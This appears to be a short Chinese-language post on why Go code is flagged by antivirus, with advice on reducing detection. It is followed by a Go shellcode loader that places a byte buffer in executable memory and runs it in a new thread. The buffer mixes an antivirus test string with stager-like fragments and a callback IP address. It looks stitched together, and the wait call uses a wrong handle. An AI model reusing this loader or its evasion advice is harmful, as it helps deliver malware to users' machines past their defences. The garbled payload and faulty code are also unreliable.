Go 语言代码被杀软查杀原因分析及优化建议

该代码使用了一些系统调用和内存分配操作，这可能被一些杀软视为可疑行为，导致被查杀。特别是在使用反射、内存操作等技术实现类似代码注入、远程控制等功能时，更容易被杀软检测到。建议避免在代码中使用过多的系统调用和内存操作，同时使用杀软允许的 API 和技术实现所需功能。

package main

import (
    'syscall'
    'unsafe'
)

var (
    kernel32         = syscall.NewLazyDLL('kernel32.dll')
    virtualAlloc     = kernel32.NewProc('VirtualAlloc')
    createThread     = kernel32.NewProc('CreateThread')
    waitForSingleObj = kernel32.NewProc('WaitForSingleObject')
)

func main() {
    buf := []byte{
        0x2d, 0x53, 0x54, 0x41, 0x4e, 0x44, 0x41, 0x52, 0x44, 0x2d, 0x41, 0x4e, 0x54, 0x49,
        0x56, 0x49, 0x52, 0x55, 0x53, 0x2d, 0x54, 0x45, 0x53, 0x54, 0x2d, 0x46, 0x49, 0x4c,
        0x45, 0x21, 0x24, 0x48, 0x2b, 0x48, 0x2a, 0x00, 0x35, 0x4f, 0x21, 0x50, 0x25, 0x40,
        0x41, 0x50, 0x5b, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68,
        0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53,
        0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89,
        0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2,
        0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5,
        0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38,
        0x2e, 0x31, 0x37, 0x30, 0x2e, 0x31, 0x32, 0x38, 0x00, 0x00, 0x00, 0x00, 0x00,
    }

    shellcodeSize := len(buf)
    shellcode, _, _ := virtualAlloc.Call(
        0,
        uintptr(shellcodeSize),
        0x1000 | 0x2000 | 0x40,
        0x40,
    )

    copy((*[1 << 30]byte)(unsafe.Pointer(shellcode))[:shellcodeSize], buf)

    _, _, _ = createThread.Call(
        0,
        0,
        shellcode,
        0,
        0,
        0,
    )

    _, _, _ = waitForSingleObj.Call(
        uintptr(0xffffffff),
        uintptr(0xffffffff),
    )
}